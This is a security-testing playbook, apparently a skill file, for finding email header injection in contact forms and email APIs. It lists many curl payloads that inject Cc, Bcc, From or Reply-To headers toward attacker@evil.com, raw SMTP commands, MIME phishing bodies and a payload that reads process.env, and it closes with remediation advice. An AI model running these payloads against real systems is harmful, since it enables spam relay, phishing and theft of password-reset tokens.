| name | testing-for-email-header-injection |
| description | Test web application email functionality for SMTP header injection vulnerabilities that allow attackers to inject additional email headers, modify recipients, and abuse contact forms for spam relay. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | ["email-injection","smtp-injection","crlf-injection","header-injection","spam-relay","contact-form","email-security"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | ["PR.PS-01","ID.RA-01","PR.DS-10","DE.CM-01"] |
| mitre_attack | ["T1190","T1059.007","T1505.003","T1083","T1055"] |
Testing for Email Header Injection
When to Use
- When testing contact forms, feedback forms, or "email a friend" functionality
- During assessment of password reset email functionality
- When testing newsletter subscription or notification email systems
- During penetration testing of applications that send emails based on user input
- When auditing email-related API endpoints for header injection
Prerequisites
- Burp Suite for intercepting and modifying HTTP requests
- Understanding of SMTP protocol and email header structure
- Knowledge of CRLF injection techniques (\r\n sequences)
- Test email accounts for receiving injected emails
- Access to application features that trigger email sending
- SMTP server logs access for monitoring injection attempts
Workflow
Step 1 — Identify Email Injection Points
curl -X POST http://target.com/contact \
-d "name=Test&email=test@test.com&subject=Hello&message=Test message"
Step 2 — Test for CRLF Header Injection
curl -X POST http://target.com/contact \
-d "name=Test&email=test@test.com%0ACc:attacker@evil.com&message=Test"
curl -X POST http://target.com/contact \
-d "name=Test&email=test@test.com%0ABcc:attacker@evil.com&message=Test"
curl -X POST http://target.com/contact \
-d "name=Test%0ACc:attacker@evil.com&email=test@test.com&message=Test"
curl -X POST http://target.com/contact \
-d "name=Test&email=test@test.com&subject=Hello%0ABcc:attacker@evil.com&message=Test"
curl -X POST http://target.com/contact \
-d "email=test@test.com%0D%0ACc:attacker@evil.com"
curl -X POST http://target.com/contact \
-d "email=test@test.com%0ACc:attacker@evil.com"
curl -X POST http://target.com/contact \
-d "email=test@test.com%0DCc:attacker@evil.com"
curl -X POST http://target.com/contact \
-d "email=test@test.com%250ACc:attacker@evil.com"
Step 3 — Inject Custom Email Content
curl -X POST http://target.com/contact \
-d "email=test@test.com%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>"
curl -X POST http://target.com/contact \
-d "email=test@test.com%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>"
curl -X POST http://target.com/contact \
-d "email=test@test.com%0AFrom:ceo@target.com"
curl -X POST http://target.com/contact \
-d "email=test@test.com%0AReply-To:attacker@evil.com"
Step 4 — Test IMAP/SMTP Injection
curl -X POST http://target.com/webmail/search \
-d "query=test%0AEXAMINE INBOX"
curl -X POST http://target.com/api/send \
-d "to=test@test.com%0ARCPT TO:attacker@evil.com"
curl -X POST http://target.com/api/verify \
-d "email=test@test.com%0AVRFY admin"
curl -X POST http://target.com/contact \
-d "email=test@test.com%0ATo:victim1@target.com%0ATo:victim2@target.com%0ATo:victim3@target.com"
Step 5 — Test JSON-Based Email APIs
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":"test@test.com\nCc:attacker@evil.com","subject":"Test","body":"Test"}'
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":["test@test.com","attacker@evil.com"],"subject":"Test","body":"Test"}'
curl -X POST http://target.com/api/send-email \
-H "Content-Type: application/json" \
-d '{"to":"test@test.com","subject":"Test","body":"{{constructor.constructor(\"return process.env\")()}}"}'
Step 6 — Validate Findings
Key Concepts
| Concept | Description |
|---|
| CRLF Injection | Injecting carriage return and line feed characters to create new email headers |
| Header Injection | Adding unauthorized headers (Cc, Bcc, From) to outgoing emails |
| Spam Relay | Abusing email functionality to send spam to arbitrary recipients |
| Email Spoofing | Modifying From or Reply-To headers to impersonate trusted senders |
| MIME Manipulation | Injecting MIME boundaries to override email body content |
| SMTP Command Injection | Injecting raw SMTP commands through unsanitized email parameters |
| Newline Characters | \r\n (CRLF), \n (LF), \r (CR) used to separate email headers |
Tools & Systems
| Tool | Purpose |
|---|
| Burp Suite | HTTP proxy for modifying email-related form submissions |
| swaks | Swiss Army Knife for SMTP testing and header injection validation |
| OWASP ZAP | Automated scanner with email injection detection |
| mailhog | Local SMTP testing server for capturing injected emails |
| smtp4dev | Development SMTP server for monitoring email injection results |
| Nuclei | Template scanner with email header injection detection templates |
Common Scenarios
- Spam Relay — Inject BCC headers to relay mass emails through the target's SMTP server, bypassing spam filters that trust the sender domain
- Phishing via Contact Form — Modify From and Reply-To headers to send phishing emails appearing to originate from the target organization
- Password Reset Hijack — Inject CC header in password reset flow to receive a copy of reset tokens sent to the victim
- Email Content Override — Inject MIME Content-Type headers to replace legitimate email body with malicious phishing content
- Internal Email Abuse — Use header injection to send emails to internal addresses not normally accessible through the application
Output Format
## Email Header Injection Report
- **Target**: http://target.com/contact
- **Injection Point**: email field in contact form
- **Encoding Required**: URL-encoded LF (%0A)
### Findings
| # | Field | Payload | Result | Severity |
|---|-------|---------|--------|----------|
| 1 | email | test@test.com%0ACc:evil@evil.com | CC header injected | High |
| 2 | email | test@test.com%0ABcc:evil@evil.com | BCC header injected | High |
| 3 | name | Test%0AFrom:ceo@target.com | From spoofing | Medium |
### Remediation
- Validate email addresses with strict regex rejecting newline characters
- Strip \r, \n, and encoded variants from all email-related input
- Use parameterized email APIs that separate headers from data
- Implement rate limiting on email-sending functionality